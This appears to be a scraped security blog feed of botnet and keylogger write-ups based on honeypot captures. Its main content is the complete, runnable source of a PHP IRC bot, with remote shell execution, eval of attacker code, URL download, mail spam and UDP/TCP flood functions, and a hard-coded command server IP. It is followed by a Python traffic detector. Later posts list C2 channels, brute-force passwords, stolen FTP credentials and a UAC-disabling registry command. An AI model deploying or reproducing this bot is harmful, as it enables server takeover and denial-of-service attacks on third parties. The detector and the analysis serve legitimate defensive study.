<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfplg20rmEGXlbsBj-l9qJ_muBAfcZEjOnwIR19vaM5Rq4HxVqp341QRobsllWtaHsQ2WqDqsHgiUQ6s0XsJD81VB2pGgrPIz7jVUV787msbw7SwjKuzUMnRI8Nr8ZrYy9Rl2xYwtSGhQ/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfplg20rmEGXlbsBj-l9qJ_muBAfcZEjOnwIR19vaM5Rq4HxVqp341QRobsllWtaHsQ2WqDqsHgiUQ6s0XsJD81VB2pGgrPIz7jVUV787msbw7SwjKuzUMnRI8Nr8ZrYy9Rl2xYwtSGhQ/s320/7.png" /></a><br />
LOL<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_c5ndhjonyVuAuJYxZIVZFjn3_xeWotKXSxxwvi9B0Mz4YtLEYR4Zs-4oKL9bc2QyjCW2e20BKzJntZervQcUOyhOnJJLJMNK6xFex6xXYqk_K4zqNphe2oei9vAbdI4PC5pBODMlqfo/s1600/8.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_c5ndhjonyVuAuJYxZIVZFjn3_xeWotKXSxxwvi9B0Mz4YtLEYR4Zs-4oKL9bc2QyjCW2e20BKzJntZervQcUOyhOnJJLJMNK6xFex6xXYqk_K4zqNphe2oei9vAbdI4PC5pBODMlqfo/s320/8.png" /></a><br />
<br />
He uses the ZmEu scanner and the pma exploit to spread a PHP botnet!<br />
Here is the bot script:<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"><?php
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class pBot
{
var $config = array("server"=>"167.114.128.120", "port"=>"6668","key"=>"","prefix"=>"", "maxrand"=>"5", "chan"=>"#Boxes","trigger"=>".","hostauth"=>"god.net");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") { $this->join($this->config['chan'],$this->config['key']); continue; }
if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case " ":
if(true)
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case " ":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case " ":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case " ":
$this->set_nick();
break;
case " ":
$this->send(strstr($msg,$mcmd[1]));
break;
case " ":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case " ":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = Exe($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case " ":
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: info updated ".$mcmd[1].":".$mcmd[2]." pass: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: switched server to ".$mcmd[1].":".$mcmd[2]);
}
fclose($this->conn);
}
break;
case " ":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: could not open output file.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: could not download \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: file \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>5) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
}
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$this->nick = "";
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->nick .= "Linux|";
else $this->nick .= "Linux|";
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"nginx")) $this->nick .= "";
else $this->nick .= "";
}
else
{
$this->nick .= "";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"".$env."".$vel."");
}
function tcpconn($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start();
?>
</code></pre>
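The bot source above hard-codes several strings that a defender can match in client-to-server IRC traffic: the fixed PING :lelcomeatme heartbeat sent when stream_select() times out, the USER registration with the literal 127.0.0.1 localhost pair and php_uname() as realname, the Linux|&lt;digits&gt; nick built by set_nick(), the [\2cmd\2]: reply prefix and the #Boxes channel from the config. The following Python scorer is an added example, not code from the original post; the rule names, weights, alert threshold and both sample sessions are constructed assumptions.

```python
"""Heuristic detector for the pBot IRC client dumped above (added example).

Scans client-to-server IRC lines, one command per line as an IRC server log or
network sensor would record them, for strings the bot hard-codes.
Rule names, weights and the threshold are assumptions made for this example.
"""
import re
from typing import List, Tuple

# (rule name, weight, regex applied to one client->server IRC line)
RULES: List[Tuple[str, int, re.Pattern]] = [
    # Keep-alive the bot sends when stream_select() times out after 30 s.
    ("pbot_ping_token", 5, re.compile(r"^PING :lelcomeatme$")),
    # "USER <prefix+digits> 127.0.0.1 localhost :<php_uname()>": ordinary clients
    # rarely send that hostname/servername pair, and the realname is an OS banner.
    ("user_localhost_uname", 3,
     re.compile(r"^USER \S+ 127\.0\.0\.1 localhost :(Linux|Windows|FreeBSD|Darwin)\b")),
    # set_nick() always builds "Linux|" + prefix + maxrand random digits.
    ("nick_linux_pipe_digits", 2, re.compile(r"^NICK Linux\|\S*?\d+$")),
    # Replies look like "[\x02dns\x02]: ..." (\2 in the PHP source is 0x02, IRC bold).
    ("bold_bracket_reply", 2, re.compile(r"^PRIVMSG \S+ :\[\x02[^\x02]+\x02\]")),
    # Channel from this sample's config block; weak evidence on its own.
    ("join_boxes_channel", 1, re.compile(r"^JOIN #Boxes\b")),
]


def scan_irc_session(lines: List[str]) -> Tuple[int, List[Tuple[str, str]]]:
    """Return (total score, [(rule name, matching line), ...]) for one session."""
    score = 0
    hits: List[Tuple[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        for name, weight, rx in RULES:
            if rx.search(line):
                score += weight
                hits.append((name, line))
    return score, hits


def is_pbot_session(lines: List[str], threshold: int = 5) -> bool:
    """True when the accumulated score reaches the (assumed) alert threshold."""
    return scan_irc_session(lines)[0] >= threshold


# Constructed session reproducing what the bot emits on connect; the digits and
# the uname banner are made up, the message shapes follow the source above.
SAMPLE_PBOT_SESSION = [
    "USER 48213 127.0.0.1 localhost :Linux web01 3.13.0-24-generic #47-Ubuntu SMP x86_64\r\n",
    "NICK Linux|48213\r\n",
    "JOIN #Boxes \r\n",
    "PING :lelcomeatme\r\n",
    "PRIVMSG #Boxes :[\x02dns\x02]: example.invalid => 192.0.2.10\r\n",
]

# Constructed benign session from an ordinary IRC client.
SAMPLE_BENIGN_SESSION = [
    "USER alice 0 * :Alice Example\r\n",
    "NICK alice_\r\n",
    "JOIN #python\r\n",
    "PRIVMSG #python :hi all\r\n",
]

if __name__ == "__main__":
    for label, session in (("pbot", SAMPLE_PBOT_SESSION), ("benign", SAMPLE_BENIGN_SESSION)):
        score, hits = scan_irc_session(session)
        print(f"{label}: score={score} alert={is_pbot_session(session)}")
        for name, line in hits:
            print(f"  {name}: {line}")
```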
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-58303408084340591202015-01-27T11:59:00.000-08:002015-01-27T11:59:08.902-08:00ragebot - 61.236.93.74 - IRC<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Server : 61.236.93.74
// hxxp://whois.domaintools.com/61.236.93.74
Port : 6667/tcp open irc Unreal ircd
Channels : #g0tme# , #pwned#
// traffic on that
<< MODE raGe|iuxwTmMNJS :+iwG
>> JOIN #g0tme#
<< JOIN :#g0tme#
<< 332 raGe|iuxwTmMNJS #g0tme# :!xpl 94 1 222.x.x.x 3 1 222.x.x.x 3 1
<< 333 raGe|iuxwTmMNJS #g0tme# root 1422314449
>> PRIVMSG #g0tme# :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 222.x.x.x with 94 threads. (autorooting)
<< 404 raGe|iuxwTmMNJS #g0tme# :You must have a registered nick (+r) to talk on this channel (#g0tme#)
// runs under the process name system32dll.exe
// bot commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
// host auth, md5 hashed: 630e20d41ee020459be07f5e8b7810dc : root.edu
// delete and download commands, md5 hashed: 099af53f601532dbd31e0ea99ffdeb64 - delete, fd456406745d816a45cae554c788e754 - download
// VNC bruteforce passwords used:
password
11111111
12345678
1234567
123456
</code></pre>
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">Plain bin and a report: search malwr for <b>81062eeec1984689b90fc38dc1bfcc6b</b></span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-68291437538051473882015-01-24T03:03:00.003-08:002015-01-24T03:03:59.453-08:00Keylogger - 77.221.130.21 <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHjwi10OHB0vSIZr58RFbS4AlU2H8Fj_n3NPMhJm8NFenlvKrf7GgLSFxZNMYkVUJykaBLbyiqV7DQEbkETYv2So09L_9jph4ADsEjPK-Y-Fs9TLDpUnWXdd-ZroCxPxkB_5FmKylW1vw/s1600/asaaaa.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHjwi10OHB0vSIZr58RFbS4AlU2H8Fj_n3NPMhJm8NFenlvKrf7GgLSFxZNMYkVUJykaBLbyiqV7DQEbkETYv2So09L_9jph4ADsEjPK-Y-Fs9TLDpUnWXdd-ZroCxPxkB_5FmKylW1vw/s320/asaaaa.png" /></a><br />
<br />
<span style="font-size: small;">Creates reports for (processes, logged keys and URLs) and saves them here:</span><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Server : 77.221.130.21 Port : 21
USER z92681.
PASS MzG5k6N2n..
OPTS utf8 on..
PWD..CWD /lo/..
// user and pass
0K9dg2kQEl+THDzDsftcRA==
1.0.0.0
127.0.0.1
3drRPuLbQmixloQTAAYA1g==
// start up
.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
// Sample and a Malwr report, search: 3b56c66455c3b1a82bcd56da18df9c38</code></pre>
<br />bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-7093653482175733192015-01-14T16:17:00.000-08:002015-01-14T16:17:05.517-08:0022k ZmEu Botnet <span style="font-family: Verdana, sans-serif; font-size: small;">On my honeypot I found this connection; there was an IRC server running on that server.</span><br />
<br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4E0C9bg6lq3hzcunphNrVRw7zmBbLHEEUWF9s_KfuIfhKUNLsUKfL1nBkQ1Orgrcffs_DFk_kvJq1jbXNtuCM9-gffnHOGPGXxDE6zbRNQyNaEP6U-nZuBIjaOh0IbL7Z1om8EfJVMW4/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4E0C9bg6lq3hzcunphNrVRw7zmBbLHEEUWF9s_KfuIfhKUNLsUKfL1nBkQ1Orgrcffs_DFk_kvJq1jbXNtuCM9-gffnHOGPGXxDE6zbRNQyNaEP6U-nZuBIjaOh0IbL7Z1om8EfJVMW4/s320/1.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Connecting to that port ... </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbEVlnCoP-4U6bUv9CqBnKa9LKfP-uHMJ7kgvOHyJeuOW1PkGJqv87h7ddxIV_7Z4oMclvAJlPAbcrcC6VIuZGslUvNuXmarY56NuBy1LAiRHB-yhOJ1RDstRVqlz2TrLiODnW7-eCtE/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbEVlnCoP-4U6bUv9CqBnKa9LKfP-uHMJ7kgvOHyJeuOW1PkGJqv87h7ddxIV_7Z4oMclvAJlPAbcrcC6VIuZGslUvNuXmarY56NuBy1LAiRHB-yhOJ1RDstRVqlz2TrLiODnW7-eCtE/s320/2.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">-Let's check the security of his server !! oh </span><br />
<span style="font-size: small;"><br />
</span> <span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJY20R3QXbZyQ16fnfkYlvgeHxcGTkvQe9Q51wQfrsc4VkyJB-iU6pgNrM0JCzErhu14L_rWO8fJznF0z0j_R8kXOKTH61K83x7KE3jRsM4d_gq-aE8M0Wu7ve9Jv-4xYuhUqWiqVBTQo/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJY20R3QXbZyQ16fnfkYlvgeHxcGTkvQe9Q51wQfrsc4VkyJB-iU6pgNrM0JCzErhu14L_rWO8fJznF0z0j_R8kXOKTH61K83x7KE3jRsM4d_gq-aE8M0Wu7ve9Jv-4xYuhUqWiqVBTQo/s320/4.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Also many connections on the port the IRC server is running on</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvd6LNUGzTf8m15JjtP3S5vkzEoTteZvSITkqBqdHwV2flttP2pPBmqvoiTcn_rEDu7QROMR49wJjo2D1N0J3J43hnRArbkPcCG5r_VOUdGjVvZGb6UzGbrvhsCRJ4UEzh10OAhGLP5ZM/s1600/5.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvd6LNUGzTf8m15JjtP3S5vkzEoTteZvSITkqBqdHwV2flttP2pPBmqvoiTcn_rEDu7QROMR49wJjo2D1N0J3J43hnRArbkPcCG5r_VOUdGjVvZGb6UzGbrvhsCRJ4UEzh10OAhGLP5ZM/s320/5.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Got his config, let's join the IRC ..</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaq1guneQj1uk6IwxDcFuL2vHP5ZYtsMVgU6PAW3Jj-Y6JJ_So__nKQbLJhEwtUgLNQViH1TskPQAPHKoAxzXn7ThO75fgxEnY-li8xXLxZmWpxhSFga9MmjAR8rxr5oHZFvdGvTicU48/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaq1guneQj1uk6IwxDcFuL2vHP5ZYtsMVgU6PAW3Jj-Y6JJ_So__nKQbLJhEwtUgLNQViH1TskPQAPHKoAxzXn7ThO75fgxEnY-li8xXLxZmWpxhSFga9MmjAR8rxr5oHZFvdGvTicU48/s320/3.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Many bots! 26k</span><br />
<span style="font-size: small;"><br />
</span> <span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi21gf23wP753vpZ9jfyTlA7RnPPIQOq776vPzw05B6KtuRpbxUYW0idSjl7jS6BZV_yB79c3D14sAlUXFdJL1RnM44Sa5kykT8LaT9-fk8hodjwKTHQ_CwbKJ3cWhy2vLiizJDFUNVJr4/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi21gf23wP753vpZ9jfyTlA7RnPPIQOq776vPzw05B6KtuRpbxUYW0idSjl7jS6BZV_yB79c3D14sAlUXFdJL1RnM44Sa5kykT8LaT9-fk8hodjwKTHQ_CwbKJ3cWhy2vLiizJDFUNVJr4/s320/7.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">/list</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2CLPl1Zg-V-zhM7tjwxAcCu0rizcvjsse9HyJFZdfB581XDj891zXVWB-R5dxfCKWs5XY9SVDB533ZQU2GCnx9rMArbHX-eHuZVSlD1u2OHO7KTAoY2wF60BRFmN7gwlNNbebPuP-LaQ/s1600/9.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2CLPl1Zg-V-zhM7tjwxAcCu0rizcvjsse9HyJFZdfB581XDj891zXVWB-R5dxfCKWs5XY9SVDB533ZQU2GCnx9rMArbHX-eHuZVSlD1u2OHO7KTAoY2wF60BRFmN7gwlNNbebPuP-LaQ/s320/9.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">2 admins' IP addresses </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqKqEb4H8E-v2MBJNH1eixs1zNFqGkuAj3TMvBqjHFhjwfyBDzWCv9iGIljCg2ZDP0JdCslR9O-PrHTF7rzQbeOnQDsMgOWObYmgzX2xwWel6CNas5OUnmT7ct5azj-9i4JItAw3TKEXM/s1600/10.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqKqEb4H8E-v2MBJNH1eixs1zNFqGkuAj3TMvBqjHFhjwfyBDzWCv9iGIljCg2ZDP0JdCslR9O-PrHTF7rzQbeOnQDsMgOWObYmgzX2xwWel6CNas5OUnmT7ct5azj-9i4JItAw3TKEXM/s320/10.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">Now I checked some logs of the infected PCs and found this ...</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDa5nAwEsz5qxRF9j3iDCAhZ8IBzgYzbgMiC-pio5OnZZ5FlZ-X2fMQSG949C29f2dy_e6Zx_As6BhCTp_qe3dPVhQAmi4qd2-clcMsd0i964YFphWcIwSAR_rPK90wV7YqjruOuCpfZQ/s1600/x1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDa5nAwEsz5qxRF9j3iDCAhZ8IBzgYzbgMiC-pio5OnZZ5FlZ-X2fMQSG949C29f2dy_e6Zx_As6BhCTp_qe3dPVhQAmi4qd2-clcMsd0i964YFphWcIwSAR_rPK90wV7YqjruOuCpfZQ/s320/x1.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">He is also spreading via a script that searches for MySQL/PHP panels with weak or no password</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">and infects them, also /panel/script/setup.php; this is a tool that HF skids use,</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">it's called the ZmEu masscan, more on that later.</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">Also 14.35.234.212 was his scanning / spreading server,</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">let's see if that one is better secured ... lolz </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkqjarKbHmEJLmpfaNP3iJLzQ59MpcLiG5C6C38z_k7Z1u38ACmSoItZPceUVlC69pe7SyxRm6HQ7wB4HoJn06WbtOk2WCbWMb7boyz6wswb70p0lRavV9-K7GYWlQ5KFwPxKoyaABes/s1600/x2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkqjarKbHmEJLmpfaNP3iJLzQ59MpcLiG5C6C38z_k7Z1u38ACmSoItZPceUVlC69pe7SyxRm6HQ7wB4HoJn06WbtOk2WCbWMb7boyz6wswb70p0lRavV9-K7GYWlQ5KFwPxKoyaABes/s320/x2.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;"> You can see it's a Perl script that attacks filtered IP addresses that have</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">a phpMyAdmin panel online or vulnerable | ps aux </span><span style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs673bfmD27v5UPmRyQGyEc6d7HdWemkeCy05ajTdycBFlbQIFFroIGqVl9qwAHInQX3ieU6Mx5Q7L4ItZigMukEnLvfeAEQeq6_Qv70XNUmp0xb4-3Ctuzh6zIuPL4zgJYr_z_UsAaYk/s1600/x3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs673bfmD27v5UPmRyQGyEc6d7HdWemkeCy05ajTdycBFlbQIFFroIGqVl9qwAHInQX3ieU6Mx5Q7L4ItZigMukEnLvfeAEQeq6_Qv70XNUmp0xb4-3Ctuzh6zIuPL4zgJYr_z_UsAaYk/s320/x3.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;"> So I located his script in /bin/.php/</span><br />
